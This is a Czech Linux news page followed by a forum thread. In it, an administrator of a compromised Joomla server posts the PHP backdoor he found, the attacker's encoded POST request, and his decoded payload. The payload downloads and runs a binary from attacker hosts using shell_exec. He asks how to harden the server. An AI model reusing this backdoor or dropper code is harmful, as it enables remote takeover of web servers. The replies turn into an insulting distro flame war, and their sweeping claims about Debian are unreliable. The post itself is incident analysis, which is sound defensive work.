Společnost JetBrains uvolnila Mellum, tj. svůj velký jazykový model (LLM) pro vývojáře, jako open source. Mellum podporuje programovací jazyky Java, Kotlin, Python, Go, PHP, C, C++, C#, JavaScript, TypeScript, CSS, HTML, Rust a Ruby.
Vývojáři Kali Linuxu upozorňují na nový klíč pro podepisování balíčků. K původnímu klíči ztratili přístup.
V březnu loňského roku přestal být Redis svobodný. Společnost Redis Labs jej přelicencovala z licence BSD na nesvobodné licence Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1). Hned o pár dní později vznikly svobodné forky Redisu s názvy Valkey a Redict. Dnes bylo oznámeno, že Redis je opět svobodný. S nejnovější verzí 8 je k dispozici také pod licencí AGPLv3.
Oficiální ceny Raspberry Pi Compute Modulů 4 klesly o 5 dolarů (4 GB varianty), respektive o 10 dolarů (8 GB varianty).
Byla vydána beta verze openSUSE Leap 16. Ve výchozím nastavení s novým instalátorem Agama.
Devadesátková hra Brány Skeldalu prošla portací a je dostupná na platformě Steam. Vyšel i parádní blog autora o portaci na moderní systémy a platformy včetně Linuxu.
Lidi dělají divné věci. Například spouští Linux v Excelu. Využít je emulátor RISC-V mini-rv32ima sestavený jako knihovna DLL, která je volaná z makra VBA (Visual Basic for Applications).
Revolut nabídne neomezený mobilní tarif za 12,50 eur (312 Kč). Aktuálně startuje ve Velké Británii a Německu.
Společnost Amazon miliardáře Jeffa Bezose vypustila na oběžnou dráhu první várku družic svého projektu Kuiper, který má z vesmíru poskytovat vysokorychlostní internetové připojení po celém světě a snažit se konkurovat nyní dominantnímu Starlinku nejbohatšího muže planety Elona Muska.
Poslední aktualizací začal model GPT-4o uživatelům příliš podlézat. OpenAI jej tak vrátila k předchozí verzi.
$ietdgc = "8c8580370182a2d20127a69c5c7b1af6"; if(isset($_REQUEST['eosdzj'])) { $wmbqhi = $_REQUEST['eosdzj']; eval($wmbqhi); exit(); } if(isset($_REQUEST['geokxjkd'])) { $wwdqd = $_REQUEST['ulgidjx']; $koayobr = $_REQUEST['geokxjkd']; $lyuot = fopen($koayobr, 'w'); $zcawdru = fwrite($lyuot, $wwdqd); fclose($lyuot); echo $zcawdru; exit(); }todle šlo POSTem po otevření infikované stránky:
eosdzj=%24p+%3d+array%5fkeys%28%24%5fREQUEST%29%3b+echo+%24%5fREQUEST%5b%24p%5b2%5d%5d%3b+eval%28base64%5fdecode%28%24%5fREQUEST%5b%24p%5b1%5d%5d%29%29%3b&p1=ZnVuY3Rpb24gZG93bmxvYWRGaWxlICgkdXJsLCAkcGF0aCkgewoKICAkbmV3Zm5hbWUgPSAkcGF0aDsKICAkZmlsZSA9IGZvcGVuICgkdXJsLCAicmIiKTsKICBpZiAoJGZpbGUpIHsKICAgICRuZXdmID0gZm9wZW4gKCRuZXdmbmFtZSwgIndiKyIpOwoKICAgIGlmICgkbmV3ZikKICAgIHdoaWxlKCFmZW9mKCRmaWxlKSkgewogICAgICBmd3JpdGUoJG5ld2YsIGZyZWFkKCRmaWxlLCAxMDI0ICogNjQgKSwgMTAyNCAqIDY0ICk7CiAgICB9CiAgfQoKICBpZiAoJGZpbGUpIHsKICAgIGZjbG9zZSgkZmlsZSk7CiAgfQoKICBpZiAoJG5ld2YpIHsKICAgIGZjbG9zZSgkbmV3Zik7CiAgfQogfQoKJG9zID0gcGhwX3VuYW1lKCdzJyk7CiR0eXBlID0gcGhwX3VuYW1lKCdtJyk7CgplY2hvICJQSFBfU1RBUlQiOwoKaWYgKCAhZnVuY3Rpb25fZXhpc3RzKHNoZWxsX2V4ZWMpICkKewoJZWNobyAibm9leGVjXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgppZiAoICRvcyAhPT0gIkxpbnV4IiApCnsKCWVjaG8gIk5vTGludXg6ICIuJG9zLiI8YnI%2bXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgoKCmlmICgkdHlwZSA9PSAieDg2XzY0IikgLy82NC1iaXQgb3MKewoJcHJpbnQgIng4Nl82NFxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzNjQiOwoJJHBzID0gIi4vcHM2NCI7Cn0KZWxzZQp7CglwcmludCAiaTY4NlxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzMzIiOwoJJHBzID0gIi4vcHMzMiI7Cn0KCiRwcyA9ICJwcyI7CgppZiAoIWZpbGVfZXhpc3RzKCRwcykpCnsKCWVjaG8gIkRvd25sb2FkICRkd1xuIjsKCWRvd25sb2FkRmlsZSgkZHcsICRwcyk7CgkvL0BmaWxlX3B1dF9jb250ZW50cygiJFBTIiwgQGZpbGVfZ2V0X2NvbnRlbnRzKCRkdykpOwp9CmVsc2UKewoJZWNobyAiRXhpc3RzICRwc1xuIjsKfQoKCmNobW9kICgkcHMsICIwNzU1Iik7CgokZW52ID0gIkJEVT1odHRwOi8vYnQyMi5tdXNpa2xzdC5vcmcvYXIxLnBocCBTSFU9aHR0cDovL3Nlby5tdXNpa2xzdC5vcmcvZ3UucGhwIFNLVT1odHRwOi8vc2VlazIyLm11c2lrbHN0Lm9yZy8gTElOPTYwMDAgREJOPWFmMDAxIjsKJGNtZCA9ICRlbnYuIiAuLyRwcyA%2bL2Rldi9udWxsIDI%2bL2Rldi9udWxsICYiOwokb3V0ID0gc2hlbGxfZXhlYygkY21kKTsKCnVubGluayAoJHBzKTsKCmVjaG8gIlBIUF9FTkQiOwo%3d&p2=b1946ac92492d2347c6235b4d2611184&shid=33338
snažil jsem se to rozluštit a dostal jsem z toho skript:
$p = array_keys($_REQUEST); echo $_REQUEST[$p[2]]; eval(base64_decode($_REQUEST[$p[1]]));a proměnná $p[1] obsahuje toto:
function downloadFile ($url, $path) { $newfname = $path; $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb+"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 64 ), 1024 * 64 ); } } if ($file) { fclose($file); } if ($newf) { fclose($newf); } } $os = php_uname('s'); $type = php_uname('m'); echo "PHP_START"; if ( !function_exists(shell_exec) ) { echo "noexec\n"; echo "PHP_END"; exit(0); } if ( $os !== "Linux" ) { echo "NoLinux: ".$os."podle data te infikovane stranky jsem našel asi 20 podobných, server jsem přeinstalil, nahodil modsecurity a v logu vidím pokusy o otevření (bývalých) infikovaných php stránek. záznam POST mám ale jen pro tuhle infikovanou php stránku (úplně první kód nahoře), a to proto, že to po vykonání POST házelo error:
\n"; echo "PHP_END"; exit(0); } if ($type == "x86_64") //64-bit os { print "x86_64\n"; $dw = "http://pages.musiklst.org/ps64"; $ps = "./ps64"; } else { print "i686\n"; $dw = "http://pages.musiklst.org/ps32"; $ps = "./ps32"; } $ps = "ps"; if (!file_exists($ps)) { echo "Download $dw\n"; downloadFile($dw, $ps); //@file_put_contents("$PS", @file_get_contents($dw)); } else { echo "Exists $ps\n"; } chmod ($ps, "0755"); $env = "BDU=http://bt22.musiklst.org/ar1.php SHU=http://seo.musiklst.org/gu.php SKU=http://seek22.musiklst.org/ LIN=6000 DBN=af001"; $cmd = $env." ./$ps >/dev/null 2>/dev/null &"; $out = shell_exec($cmd); unlink ($ps); echo "PHP_END"; )
Apache-Error: [file "/build/buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2/php5-5.3.3/sapi/apache2handler/sapi_apache2.c"] [line 326] [level 3] PHP Notice: Use of undefined constant shell_exec - assumed 'shell_exec' in /var/www/stranky/libraries/joomla/http/index.php(1) : eval()'d code(1) : eval()'d code on line 28
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Díky
Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.V PHP je dost slabá hranice mezi nebezpečné a užitečné, často se to i překrývá.
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Předně je nezbytné změnit distribuci. Když člověk používá tu nejhorší, jaká je kde k nalezení, těžko se může divit následkům tohoto typu. Nikdo neví, kolik se v záměrně špatných distribucích skrývá problémů tohoto rozsahu.
…buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2…
Taky jsem to hledal…
Tak to je dobrá otázka. Ne, stále ještě mě neopustil ten zlozvyk říkat přesně to, co kolem sebe vidím, bez vytáček, bez politické korektnosti a bez snahy být zadobře se „všemi“ nebo s „většinou“.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne. Hlavně je úsměvné, jak často Debian neustojí ani jednu jedinou aktualizaci systému (což je pro normální distribuce běžný proces, který by se měl dít asi tak jednou týdně nebo častěji) a jeho uživatel pak celý stroj přeinstaluje, místo Shitty tam dá Crappy a dostane se znova do naprosto stejné situace, jen posunuté v čase. Kdepak zloba — zkrátka jen říkám, co vidím.
Dokladuj prípady zlyhania aktualizácie debianu.
K tomu nemám důvod ani potřebu, i když by asi stačilo prohledat pár desítek dotazů z místní poradny. Kdo chce tu sračku používat, dobře mu tak. Proč bych mu něco dokládal?
Ich habe keine Probleme mit stable debian.Du nichts mochte lernen.
I Dont have a Problem with stable debian. You dont want to learn.
Co je to stable verze? Jak může mít systém sestávající z tisíců balíčků verzi? Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví. Děkuji, nechci. Používat 5 let staré technologie s 5 let starými bugy je na mě opravdu moc složité. Já používám pouze software, který je aktuální a který zkrátka funguje.
Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.Your logic is flawed...
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví.To je lež, lež, lež.
Kdepak zloba — zkrátka jen říkám, co vidím.Halucinogeny jsou svinstvo. Zkus to bez nich a možná to bude lepší.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne.
Na arch by mohol byť aj titulok : "Arch falling of the Cliff"
Předně je nezbytné změnit distribuci.Schovej si tyhle svoje bláboly někam mimo poradnu, jo? Děravou Joomlu opravdu změna distribuce nevyřeší. A co se týče odkazovaného problému - IIRC se vývojáři Debianu ptali v mailové konferenci vývojářů OpenSSL a ti tu (chybnou) změnu odsouhlasili s tím, že totéž udělají v upstreamu. Následně zjistili, že ne, ale nikomu v Debianu už to neřekli.
Vieš o tom, že archlinux v openVZ poriadne nefunguje.
Ako si predstavuješ bezpečnosť ? Vyzerá to tak, že nová verzia všetko rieši.
Mně stačí, že funguje v LXC. Navíc v ArchLinuxu v podstatě nikdy nepoužívám distribuční kernel, takže vlastně nevím, kde všude ArchLinux sám od sebe funguje a kde ne.
Na serverech často ArchLinux nemám, protože ne každý je fanouškem ArchLinuxu a u sdílených strojů je lepší mít systém, kterému s rozumnou pravděpodobností bude víc lidí rozumět. Proto zpravidla padne volba na Fedoru. U jednoho z předchozích zaměstnavatelů jsem měl dokonce desktop s Fedorou (zpočátku z povinnosti/nutnosti). Sice to nebyl můj oblíbený ArchLinux s custom kernelem a pár vychytávkami, ale co se týká spolehlivosti a rozumného implicitního nastavení, nemohl jsem si ten desktop vynachválit. Tedy nechápu ten intenzivní masochismus, který někoho přivede až k Debianu, ať už na desktopu nebo na serveru.
Problémy s bezpečností nemají jiné řešení než přechod na novou verzi. Jediná otázka je, jestli to bude nová verze přímo od tvůrců daného balíčku (což přesně v případě OpenSSL nelze než doporučit), nebo stokrát patchovaný paskvil, který se snaží opravit chybu a zároveň zůstat kompatibilní s nějakým zoufale zastaralým prostředím. Debian volí druhou možnost a jeho 32768 OpenSSL klíčů byl jeden z hvězdných výsledků tohoto přístupu k věci.
mirror.vpsfree.cz:~# grep "connect from" /var/log/rsyncd ... 2012/08/08 08:32:54 [13520] connect from UNKNOWN (195.39.65.169) 2012/08/09 09:27:11 [15203] connect from UNKNOWN (195.39.65.169) 2012/08/10 12:28:49 [18338] connect from UNKNOWN (195.39.65.169) 2012/08/13 12:21:57 [30405] connect from UNKNOWN (195.39.65.169) 2012/08/14 10:13:22 [32294] connect from UNKNOWN (195.39.65.169) 2012/08/14 17:28:08 [432] connect from UNKNOWN (195.39.65.169) 2012/08/15 11:37:58 [1857] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:19:28 [15359] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:37:54 [15372] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:38:36 [15373] connect from UNKNOWN (195.39.65.169) 2013/01/14 21:56:20 [19673] connect from node1a.prg.vpsfree.cz (77.93.223.10)
Tiskni
Sdílej: